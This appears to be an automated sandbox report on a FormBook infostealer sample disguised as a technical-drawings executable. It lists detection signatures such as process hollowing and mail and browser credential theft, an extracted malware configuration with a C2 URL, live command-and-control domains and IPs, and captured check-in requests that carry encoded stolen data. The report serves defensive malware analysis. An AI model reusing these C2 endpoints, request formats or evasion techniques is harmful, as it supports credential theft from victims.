Windows Analysis Report
Technical Specifications & Drawings.exe

Overview

General Information

Sample Name: Technical Specifications & Drawings.exe
Analysis ID: 680337
MD5: 9b94f751e8cc145058db9f428c2ad571
SHA1: f12af989efe2b3b11e4784899ca4c6794da17879
SHA256: 893a0b655917a18e5886348b39f6023fa851cf3d89e5b8709219ad3d2766fa97
Tags: exeFormbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Technical Specifications & Drawings.exe Virustotal: Detection: 32% Perma Link
Source: Technical Specifications & Drawings.exe ReversingLabs: Detection: 21%
Yara detected FormBook
Source: Yara match File source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.kirchhoff-darryl.com/02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ Avira URL Cloud: Label: malware
Source: http://www.tomoptique.fr/02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ Avira URL Cloud: Label: malware
Source: http://www.mexc-event-partner.site/02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ Avira URL Cloud: Label: malware
Source: http://www.esandcraic.com/02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ Avira URL Cloud: Label: malware
Source: http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91 Avira URL Cloud: Label: malware
Source: http://www.mexc-event-partner.site/02pi/ Avira URL Cloud: Label: malware
Source: www.tomoptique.fr/02pi/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: boshi-eg.online Virustotal: Detection: 12% Perma Link
Source: mexc-event-partner.site Virustotal: Detection: 5% Perma Link
Machine Learning detection for sample
Source: Technical Specifications & Drawings.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.tomoptique.fr/02pi/"], "decoy": ["M3tfGJmJRxnXx2v38A==", "m4b8szAh7fn1GFTQt32C+uKxPpY=", "aq5+I6igUigQzHUz", "4lHg1pN4fbZQ8Hg5", "pZgq+XdYRJZGtZpXb/gobxk=", "ngmngHIN+PJf3danjt0=", "aWHnw0nyXCgQzHUz", "Qa+KQe7PL5g83V8q", "lX0/3lMZHyGWQPyVm46Q9eKxPpY=", "syPESuXcWyQQzHUz", "ULeDOo1rfqvVcCs=", "COFEArOnRS4JMdemgP8DLQqSNA==", "OqdvdWhJyOqVPg==", "ANt3czoMin1DUZcstDUe", "rKFuM+S9pv/riVlgxBgU", "xzso55N63kL1Ltanjt0=", "hu2RdTMU7NZL0ZeqvEGH7OKxPpY=", "phmUZhkO/d6ZTx6mWMQ=", "Wj2oYxTKjw68jMwazrQW", "lv2aiTsU6N7OqJUTBj2Y+uKxPpY=", "5L0q4IlGEpRTlSYstDUe", "FvK8ah8qZ6vVcCs=", "abtoVRsE4tE6sNIRwiGUA+KxPpY=", "y8Gdr3IxeuRASI4Jy+8KaA==", "N7Em3E0iRrJy3danjt0=", "OBWvoWlwJbCSGdanjt0=", "kHkzKtyb51bk65cS+g==", "BVkF/LV3JBY+srgvS9U=", "fd2hjkcgFnNDp9ilV9U=", "edamUMWCAMievvdJA4WztmMX", "h/qtrJyTWSJL/PxJHlLzWAg=", "kWe7Ro0IyOqVPg==", "QrAe3YpmUGlDSXfy/wMvSTmfNg==", "ZWHgx4I+k/iuEUaNFmBIl0c0Hiy9", "iPlzLaJyecBx3tanjt0=", "Fo9S+XIwpyB1byMstDUe", "SkLiwnZYrCYQrGBeaKYibhE=", "XcysZNaTMwWxq2OmTRULYA==", "aNu4UwbkA17EoBLXgP02mT00Hiy9", "Mo8yuSKja+g9", "607Ad/rXD5aMLt2xfIZ2e1NnoZ4=", "pXk25GIbEhR4+i13QkI+STmfNg==", "uysGFdukYWM8/QtMBEyc/uKxPpY=", "fmH+9tKRYRD/oVthN3aztmMX", "TbWDRDb0g9Ciq2OmTRULYA==", "tqF7KKme4y7gKNanjt0=", "6+CEgnJVgQLuirED1LIRexM=", "YFTOiPnMSI9rJw==", "k/yeppGCO9fBv/c8", "Kqk+FsSThJHxaSMiNY+ztmMX", "HezQg/rXDY51FtXgrAd8lkv0sCmtHTtGnw==", "GWjsvjb3CHtxvjlKOYiztmMX", "QCnkguifwkk/mCkstDUe", "zTm3ZwwBFoJjoigstDUe", "4VQ4+q5U0aUIx2v38A==", "7c038ndW7jMCtjw=", "8d6NjFQhZqvVcCs=", "xqJFQfyja+g9", "iHDxwkgzyOqVPg==", "OSu/mIgimCB8X9MWJixbvWOuqdoDwaU=", "Sq1WTzwwyOqVPg==", "huZUE5ZZNtqY/wlhy+8KaA==", "g27epFQnkhaSqe1sRB2ztmMX", "b9WRoY5wEffprIkPy+8KaA=="]}
Uses 32bit PE files
Source: Technical Specifications & Drawings.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Technical Specifications & Drawings.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Technical Specifications & Drawings.exe, Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 109.234.162.62 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.mexc-event-partner.site
Source: C:\Windows\explorer.exe Domain query: www.gzkanglongkeji.com
Source: C:\Windows\explorer.exe Network Connect: 107.155.208.43 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 184.168.107.80 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 67.23.226.119 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.kirchhoff-darryl.com
Source: C:\Windows\explorer.exe Network Connect: 67.223.117.72 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.boshi-eg.online
Source: C:\Windows\explorer.exe Domain query: www.tomoptique.fr
Source: C:\Windows\explorer.exe Domain query: www.esandcraic.com
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 67.23.226.119:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 67.23.226.119:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 67.23.226.119:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49809 -> 67.223.117.72:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49809 -> 67.223.117.72:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49809 -> 67.223.117.72:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.tomoptique.fr/02pi/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: O2SWITCHFR O2SWITCHFR
Source: Joe Sandbox View ASN Name: BEKKOAMEBEKKOAMEINTERNETINCJP BEKKOAMEBEKKOAMEINTERNETINCJP
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ HTTP/1.1Host: www.kirchhoff-darryl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ HTTP/1.1Host: www.tomoptique.frConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /02pi/?ZL0=4npjF3s9G6uWNp4ceBGqcNUcjkX96JEG8J4d3OAuWw45Kxpl9gSb2BHY5Eg4Nc6InaukRaYVJuT4y0aleUHPUlqgoOBFmRDZHQ==&wRtdp=ETVPg0_ HTTP/1.1Host: www.boshi-eg.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ HTTP/1.1Host: www.esandcraic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ HTTP/1.1Host: www.mexc-event-partner.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 67.223.117.72 67.223.117.72
Source: Joe Sandbox View IP Address: 67.23.226.119 67.23.226.119
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /02pi/ HTTP/1.1Host: www.mexc-event-partner.siteConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.mexc-event-partner.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mexc-event-partner.site/02pi/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 5a 4c 30 3d 44 76 79 6b 59 68 57 49 4d 35 4c 42 4a 6a 4d 50 6a 54 75 63 62 57 6d 55 44 47 6a 73 66 32 46 4f 72 53 64 48 57 70 34 47 61 33 74 68 66 6a 38 75 79 5f 54 78 59 47 53 44 75 33 62 4c 39 42 7a 62 39 47 57 70 74 79 46 63 62 75 70 69 6f 68 6f 32 6d 5a 51 56 77 5a 7e 45 62 35 42 51 71 64 43 78 66 72 6f 78 42 49 62 70 39 44 47 75 43 31 5a 30 69 52 7a 49 4d 53 7a 7a 32 78 43 77 6d 76 61 52 4e 31 7a 49 62 44 50 49 4d 5f 62 72 31 33 36 6b 6d 7a 39 35 4e 67 61 62 55 51 4a 31 6b 50 63 62 41 55 71 63 37 55 45 52 32 73 48 51 55 66 46 65 5a 46 4f 7a 35 4e 4e 35 7a 68 6b 4a 6b 50 6b 35 57 53 37 6a 28 47 52 42 41 71 49 7a 64 74 78 42 54 72 46 39 36 4c 77 2d 57 32 63 52 66 32 63 57 74 31 28 5f 4b 43 54 63 65 35 74 43 76 64 59 53 45 5f 6f 36 59 31 59 2d 41 79 45 43 4f 36 6e 73 66 6e 71 72 39 4d 35 34 6d 44 79 6f 39 47 71 66 4f 48 6c 58 37 74 41 41 7a 32 51 4a 71 51 41 63 33 52 49 4f 45 2d 42 64 71 4a 48 6c 69 37 6b 68 41 6c 45 4f 6d 68 6a 72 35 37 6b 71 6e 4e 55 6f 6e 4e 66 4f 51 70 48 43 58 79 67 71 66 58 67 68 77 34 71 52 56 47 6c 61 38 50 50 57 5a 63 4c 6c 7e 38 65 44 72 52 57 79 48 4a 59 70 30 53 4a 41 56 59 6c 76 6d 33 33 33 6c 6f 4f 2d 6b 6b 54 2d 63 69 57 52 79 36 54 35 7a 51 79 71 52 6f 44 4c 6d 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ZL0=DvykYhWIM5LBJjMPjTucbWmUDGjsf2FOrSdHWp4Ga3thfj8uy_TxYGSDu3bL9Bzb9GWptyFcbupioho2mZQVwZ~Eb5BQqdCxfroxBIbp9DGuC1Z0iRzIMSzz2xCwmvaRN1zIbDPIM_br136kmz95NgabUQJ1kPcbAUqc7UER2sHQUfFeZFOz5NN5zhkJkPk5WS7j(GRBAqIzdtxBTrF96Lw-W2cRf2cWt1(_KCTce5tCvdYSE_o6Y1Y-AyECO6nsfnqr9M54mDyo9GqfOHlX7tAAz2QJqQAc3RIOE-BdqJHli7khAlEOmhjr57kqnNUonNfOQpHCXygqfXghw4qRVGla8PPWZcLl~8eDrRWyHJYp0SJAVYlvm333loO-kkT-ciWRy6T5zQyqRoDLmA).
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 10:28:44 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 10:28:49 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 3
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 10:29:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 10:29:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
